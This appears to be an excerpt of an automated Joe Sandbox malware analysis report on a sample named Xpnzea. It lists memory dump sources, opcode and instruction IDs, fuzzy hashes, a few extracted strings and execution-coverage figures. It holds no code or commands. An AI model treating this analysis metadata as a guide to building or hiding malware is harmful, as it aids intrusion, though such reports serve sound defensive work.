                                              • Instruction ID: 3b87b55a6f3591c9f12aad51d1f5c31d31786d72e55af18b8ade4ad9a8b5403e
                                              • Opcode Fuzzy Hash: f39926d7b5fc3c65bc6a0daa95f2bb16e77f0297acb059e6ef0e30b2f5d74922
                                              • Instruction Fuzzy Hash: 3E0169B5C09209EFCB40DFA8C8486ADFFF5FF09301F2040AAD405E22A0E7344A41CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a3fe122155cb4c799c9337c0f2cacb7123856a1df8241b8aca6800d95f9cd9a
                                              • Instruction ID: 54279b41c47c20f38287364fdcd19a867ba50217d5b5bbcc35d0b7d1e4285321
                                              • Opcode Fuzzy Hash: 5a3fe122155cb4c799c9337c0f2cacb7123856a1df8241b8aca6800d95f9cd9a
                                              • Instruction Fuzzy Hash: 4BF0B4313101109FC30CA73EA485A6E37D7EBC9311B5480B7E10AD73A4CE31ED428754
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a02f8059f5f0a2680fbd2b551006c799496fee5acaa5d0ad58d8ca3217b608f0
                                              • Instruction ID: c3b3d21b3a1c766ac7e1ef3481f21b429b8798e3d91ceb2f340f3454c07f68ed
                                              • Opcode Fuzzy Hash: a02f8059f5f0a2680fbd2b551006c799496fee5acaa5d0ad58d8ca3217b608f0
                                              • Instruction Fuzzy Hash: 9EF01471D05208EFCB44EFA8D8446AEFBF8FF08300F2044AA9809E3690E7345A41CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657725165.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_64a0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96584140df62a12a9bff6f88f55c4c8babdd8691385936be5de19dbc446d4cbb
                                              • Instruction ID: 2db2e8271f3f1996e513cc5e9ec40459a78cf2178d757de26f7a106fcb6cb3f1
                                              • Opcode Fuzzy Hash: 96584140df62a12a9bff6f88f55c4c8babdd8691385936be5de19dbc446d4cbb
                                              • Instruction Fuzzy Hash: E101D078A012289FCB64EF24DD459DABBF1FB89340F1090EAE409A3B45DA345F85CF51
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe22a000729c6a99946fab88c80b941f35404908ac93f1417cd4bdc87dab87fc
                                              • Instruction ID: 1f1285e8c9915422c1f1717c684d300cf83db8a50d6865f120d9bcbe5dfe057e
                                              • Opcode Fuzzy Hash: fe22a000729c6a99946fab88c80b941f35404908ac93f1417cd4bdc87dab87fc
                                              • Instruction Fuzzy Hash: 41F06271D09248AFCB41CFA8C840AADBFF5AB49200F14C4DBE858D7261C2398A11DF10
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4531c9f270e86e09c22b394cd05f7632557156d3e857fbace668d13dcd58030
                                              • Instruction ID: bbfa6bbdcb21ade2be4b84127d38a3445e0828b033407e0d9d800123600dcfd6
                                              • Opcode Fuzzy Hash: b4531c9f270e86e09c22b394cd05f7632557156d3e857fbace668d13dcd58030
                                              • Instruction Fuzzy Hash: 61F03A393406009FC714DB29D894E2A77AAEFC8721B108069FA168B360CA71EC42CB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a8b8cae6be1b68921507b59dab6fea435eafc772e5dea7eda268e02c407e751
                                              • Instruction ID: 07a6b5faa22a06b968449afa568ccb4be5db22c3877e8423c4ba5de829c84019
                                              • Opcode Fuzzy Hash: 5a8b8cae6be1b68921507b59dab6fea435eafc772e5dea7eda268e02c407e751
                                              • Instruction Fuzzy Hash: E9F0A034849208EFDB41DF65C8448A9BFB5FF0A321F2081EEE98597631C2314E94EF50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99bc5e8425fb2128a4ce79faf7c0edb8de67d4705d5974de2d2c721ce2e3b463
                                              • Instruction ID: e14c16c189e259d2b431d5b3fb92a4459a629b6363fb8235f492eea7e0f629bd
                                              • Opcode Fuzzy Hash: 99bc5e8425fb2128a4ce79faf7c0edb8de67d4705d5974de2d2c721ce2e3b463
                                              • Instruction Fuzzy Hash: F5F08230D0E348BFCB45DF69980069DBFB9AF46210F1081EAD954A72A2D6354A04CB51
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b27a134cb2116b24f9fa7b794db6f2af250c376e03dfeeee829136be3a2c9228
                                              • Instruction ID: 244208f25c346751838cb807d039c022ab54bc687c0f1d31edc189ac57aad157
                                              • Opcode Fuzzy Hash: b27a134cb2116b24f9fa7b794db6f2af250c376e03dfeeee829136be3a2c9228
                                              • Instruction Fuzzy Hash: 7DF0E53144A3859FE3078774D5113993F759F03115F1444CEC8845A163D5334946C745
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b018eed0da77c1cf5581f489979c0214eb53e99d9dfe0d42acf509d8d8186a81
                                              • Instruction ID: a4da7c4a2dd81feb1fd898364ea5e8f6e6188b10e2900b04cfb9ab7ebda318ce
                                              • Opcode Fuzzy Hash: b018eed0da77c1cf5581f489979c0214eb53e99d9dfe0d42acf509d8d8186a81
                                              • Instruction Fuzzy Hash: 54E06D7054A3589FC7528FB0ED41AAD7F2AAF43206B1042DAA40963961CA324944CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0be704fbe60833027907fd9cb592b9ef6bffa4d25aee05332f5a6ed980fe5176
                                              • Instruction ID: 36204f87547ddb8cd4581d28c68abd16e4f4ee8b0eff86799631d1e1e4a45b3e
                                              • Opcode Fuzzy Hash: 0be704fbe60833027907fd9cb592b9ef6bffa4d25aee05332f5a6ed980fe5176
                                              • Instruction Fuzzy Hash: 89F0A035809288AFCB02CF90C9405ADBFB5EB46210F24C1DADC66A3362C6368B12EF50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7cd89dbc53c1452e9314a5ce5abd039f5b9baaca61c74cf1825a7d1a94bfdf5
                                              • Instruction ID: 999a0c9fdf04d83cce9d513232360691b28eb2bf1845b840d8889716a8049008
                                              • Opcode Fuzzy Hash: e7cd89dbc53c1452e9314a5ce5abd039f5b9baaca61c74cf1825a7d1a94bfdf5
                                              • Instruction Fuzzy Hash: 4DF058399083859FCB55CFB4D844A98BBF4FF16220B2085DAD9A49B6A2D2385A42DF11
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc6bd95d40c38f3292b72f986d36e931c5f5e426c5ea50661142f5e5183fec5b
                                              • Instruction ID: ef9827b32c1341ef688f29990dc91f7f324168e4f4bd329ea1ae7d6f790131dc
                                              • Opcode Fuzzy Hash: fc6bd95d40c38f3292b72f986d36e931c5f5e426c5ea50661142f5e5183fec5b
                                              • Instruction Fuzzy Hash: 18F0E53824A3058FC7829B70F895ADA7B72AF85304F1040D9F455976A1CB764FC5CB92
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 153c34da4e13076800678b9386f50addaff864336df29d7b2fb722b438404917
                                              • Instruction ID: 4ecfdac7c8e07b6319136257129fe9f260fb6bd070a4b37132ab58e8b8c5b484
                                              • Opcode Fuzzy Hash: 153c34da4e13076800678b9386f50addaff864336df29d7b2fb722b438404917
                                              • Instruction Fuzzy Hash: E3E0223104E2899FCB52CBB8DD06AA87FF89B07120F1403DAD994A66F3C2690A01C786
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d883664203ae404f421e93276ea8c023bbb8df873516c20af5d3d092f65983f
                                              • Instruction ID: 7c52fd7b6b6beb5acb0feffd7bbfd290027ab1bd29407da38c973e72d21186db
                                              • Opcode Fuzzy Hash: 7d883664203ae404f421e93276ea8c023bbb8df873516c20af5d3d092f65983f
                                              • Instruction Fuzzy Hash: BEF08C74E09244AFCB84DFA8D8806DCFFB0EF4A200F2080EE985993311D2315A46DF40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d747feff39ec5f24337eb1a86e5a9a8c903aa94d583d90b5dd8bc93d18320732
                                              • Instruction ID: 66aec5c62a501c4f370dcc66688fc2210edce0f51bab3e36bf4deb24a734faf2
                                              • Opcode Fuzzy Hash: d747feff39ec5f24337eb1a86e5a9a8c903aa94d583d90b5dd8bc93d18320732
                                              • Instruction Fuzzy Hash: 9AF0F875D08248EFCB84DFA9D840AADBBF8AB49210F14C49AAC68E3251D6359A11EF50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9bbf758c1536775dbea11de572d3ac75a7ce601e9cc35a3ceb01aa4567bfde9
                                              • Instruction ID: d342f2202cbceb91b28fb3eb79e88e6408dd5c55091212522cc5c95249ed94f8
                                              • Opcode Fuzzy Hash: f9bbf758c1536775dbea11de572d3ac75a7ce601e9cc35a3ceb01aa4567bfde9
                                              • Instruction Fuzzy Hash: 2AF0BDB1949118CFD714DB79C8486AEBBBABF49300F2451A9D107E7623DF384945CF00
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 169b4234a0428b9bbb19c91ae54f8af72ea119785e452f3e2b67cc2548f2030c
                                              • Instruction ID: 4539251fce124f6093ad751e1b93893b5bed4857f60e5b0214d35bcc6458eba7
                                              • Opcode Fuzzy Hash: 169b4234a0428b9bbb19c91ae54f8af72ea119785e452f3e2b67cc2548f2030c
                                              • Instruction Fuzzy Hash: CFF082769082849FC701CF68C9049ACBFF1FF06310B1591DAD8A497772C2748E41DF01
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 400da442c87f5299615cf22f92931bce733efd5bf74291b11d62f57efda828db
                                              • Instruction ID: 33a0c9277f085937ef7a6c969eff134b6a80827b65753740575b0dd3478d46ee
                                              • Opcode Fuzzy Hash: 400da442c87f5299615cf22f92931bce733efd5bf74291b11d62f57efda828db
                                              • Instruction Fuzzy Hash: A3F0A074809248EFC705DBA0D900969BF74BF46310F2480DED84127262CB319E16DB41
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dbf2649fbfcd6d0b3c528d1d9438b5f01ad629d7ad26f63e090bafe91d0779f1
                                              • Instruction ID: cae298336ca48c28a60a8f6660ae5a1abc5e5c736ad3c3d726699c97bd565254
                                              • Opcode Fuzzy Hash: dbf2649fbfcd6d0b3c528d1d9438b5f01ad629d7ad26f63e090bafe91d0779f1
                                              • Instruction Fuzzy Hash: 8CE092B5908248ABCB04DFA0E905B6DBFBDEB4A305F20C0D9DC4627722CA355D42DB40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7678c83b4109367c22afd6ae9bb902a25ef0b1e1c54e5a96a67953b02d2657df
                                              • Instruction ID: c27c782ce243fdf9cefbec3cacc50d7e5ee9fd49e46376268f076e9024c76b3d
                                              • Opcode Fuzzy Hash: 7678c83b4109367c22afd6ae9bb902a25ef0b1e1c54e5a96a67953b02d2657df
                                              • Instruction Fuzzy Hash: B5E0123120030957C7149A6EF884C8BF79AEFC4665714C539E11A87625DEB0AD4986A1
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1e5ed8cbbe7bdba2739cdcaeaf4b5e58e58e408e9077ac1c047b82cbb9c47fe
                                              • Instruction ID: bc6d25845a62595fbbdaddf2e3ace607a7874a69ff9922b6ea03c38ab8a41231
                                              • Opcode Fuzzy Hash: d1e5ed8cbbe7bdba2739cdcaeaf4b5e58e58e408e9077ac1c047b82cbb9c47fe
                                              • Instruction Fuzzy Hash: 9AF0A575D04208EFCB45DFA9D940A9CFBB5FB49314F10C0EA9C58A3390D6319A55DF40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab9e79de3a372eeeddfa764c8b6699036b513cd8ca8e7029e257fdce366214a9
                                              • Instruction ID: 14ba4adf7211c8c09c7d146726ed57d5e8521193b65842fdfab5c77980093d9a
                                              • Opcode Fuzzy Hash: ab9e79de3a372eeeddfa764c8b6699036b513cd8ca8e7029e257fdce366214a9
                                              • Instruction Fuzzy Hash: 33E0D83585D148EBC704DB90E90567DBF7DEB47209F1480EDD94663352CA315D02CB44
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cca7696afa7f317a2244e6a7627175b66708b5f2d03dd64fb9d1a85b11454137
                                              • Instruction ID: f668592b093e9c0947a3973d3336a88d5b7c3d93c8237a152b8d276f9f924f1f
                                              • Opcode Fuzzy Hash: cca7696afa7f317a2244e6a7627175b66708b5f2d03dd64fb9d1a85b11454137
                                              • Instruction Fuzzy Hash: 59C04C3555B2902FEB031630AD579D37F6595032007190582B084D64A2C41D1656DB66
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657725165.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_64a0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a699254efac5a1f6c32fba1ef024e5c8d1cce881344742b8dd47860eb69c319
                                              • Instruction ID: 8bd3909f303dab288c13e54ecfa0e035eee2f8c9fefe0021cc4be397c06a6954
                                              • Opcode Fuzzy Hash: 5a699254efac5a1f6c32fba1ef024e5c8d1cce881344742b8dd47860eb69c319
                                              • Instruction Fuzzy Hash: DFC08C3285B20A8FEA581B82A8083B1BBAC8B0720AF0038C7590C11921CAB05442CBA5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b38e5e17e8b947384096c8e7fb22d786bb71a1f679dd5052c05dc5fa5e715f8
                                              • Instruction ID: b3b0d2318825be25efe4bde7345c6309a49ce32f4ab705f40a845c1e0cbc3f04
                                              • Opcode Fuzzy Hash: 8b38e5e17e8b947384096c8e7fb22d786bb71a1f679dd5052c05dc5fa5e715f8
                                              • Instruction Fuzzy Hash: 6FC080310212084FD3553B95BC0E7347F5CD705317F040197E55C104709F7514D0CB15
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60db21c30d9e0566cf0ffd871d7f6aecefdad827da6cdfd79a4bae25fbc6b004
                                              • Instruction ID: 243cf56b85f58aef401fccb2a9e191206084fce440e02e24b7cf12e3e8729775
                                              • Opcode Fuzzy Hash: 60db21c30d9e0566cf0ffd871d7f6aecefdad827da6cdfd79a4bae25fbc6b004
                                              • Instruction Fuzzy Hash: 5FD0A739901360CFC7096F14EC847153BB4FB08341B560895C847A3250C334E8019A86
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657725165.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_64a0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52ff930fe77d3d1e745efcdd1ec3ae2f64480a27908527102b970e12def7d926
                                              • Instruction ID: aa047fd1c3cd372226188c41336ffacb2c0f3d8805f1bb09f8ece4b17ac3ca1e
                                              • Opcode Fuzzy Hash: 52ff930fe77d3d1e745efcdd1ec3ae2f64480a27908527102b970e12def7d926
                                              • Instruction Fuzzy Hash: B7D023301021048FD300DFD0C8077E776F5D784304F109055D01973384CF354D414B52
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35ea76d9ce315df6d15dd92612d77cd6fa46df5db9045a1e905d3cef81d8542e
                                              • Instruction ID: ea2eec05faf630629c00ad4847aaad37681b74a8976d1e03c13494b224aed3c8
                                              • Opcode Fuzzy Hash: 35ea76d9ce315df6d15dd92612d77cd6fa46df5db9045a1e905d3cef81d8542e
                                              • Instruction Fuzzy Hash: 26B0122C04F3D83FC78332313C12CFA1E350C5312038901C371709916394085A945275
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b83b8f706a8543c4a66ef7486c0cfb04ad116242a6ade406e6f2d7ed60358d2f
                                              • Instruction ID: b7c7a7fdca7506684158dcc16e2b17270672f761d9cee434c9378abea86f026a
                                              • Opcode Fuzzy Hash: b83b8f706a8543c4a66ef7486c0cfb04ad116242a6ade406e6f2d7ed60358d2f
                                              • Instruction Fuzzy Hash: 7BC08CE2C8A2C00FC60396301C224563F254A222003060993B002C50A3C908A604822B
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d61dee42daf54a248519779e7ea61a8804d7184832438a61dbb44f93fd4ee2e4
                                              • Instruction ID: 5d38e86a6edd3b0e25b50f003382b8a5df5ce350f2da5e0cd9a69f44ec98fa3d
                                              • Opcode Fuzzy Hash: d61dee42daf54a248519779e7ea61a8804d7184832438a61dbb44f93fd4ee2e4
                                              • Instruction Fuzzy Hash: 30B01242CB99A1CED70608780C209441A60EBF1E117C90BB77491D7ACBF10CC80E4074
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 634224c9df237e6530a3be125a389133344698030af60162ae4f2b43fd140765
                                              • Instruction ID: 6db4c456e7d096d12184200aa9a34306340785c2eb4b2ed8938810dcfecf7c87
                                              • Opcode Fuzzy Hash: 634224c9df237e6530a3be125a389133344698030af60162ae4f2b43fd140765
                                              • Instruction Fuzzy Hash: 4BC04C31447B14DEEB04577578163607FA8E780215F844017E45994031972825059946
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d01550453e9d22ac991536becd95d56a6111d2ac801dddf06ba9e1338f59726
                                              • Instruction ID: 1952a0e03c6149118aecffd7252486e43cc41fc8137ca8643bb212301b2dbd43
                                              • Opcode Fuzzy Hash: 5d01550453e9d22ac991536becd95d56a6111d2ac801dddf06ba9e1338f59726
                                              • Instruction Fuzzy Hash: 18C04C76E1001E9BCF04DBD9E9418DCFBB4EF94322F404036D214A7104D6301526CF54
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                              • Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
                                              • Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                              • Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                              • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                              • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                              • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ff7b44169ad368474a442af72fe171979dc99734d65d95f08fbc639f9769c9
                                              • Instruction ID: 76dbf9f6db69bdb4e807b0772a51d5522ec86f9d75556f2aaaae69b881502439
                                              • Opcode Fuzzy Hash: f4ff7b44169ad368474a442af72fe171979dc99734d65d95f08fbc639f9769c9
                                              • Instruction Fuzzy Hash: 15900232046E0CCF4A4027967819555BB6CEA845267D40052F51D555115A6564144595
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$%$G$`$i
                                              • API String ID: 0-439984575

                                              Execution Graph

                                              Execution Coverage:11.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:10
                                              Total number of Limit Nodes:2
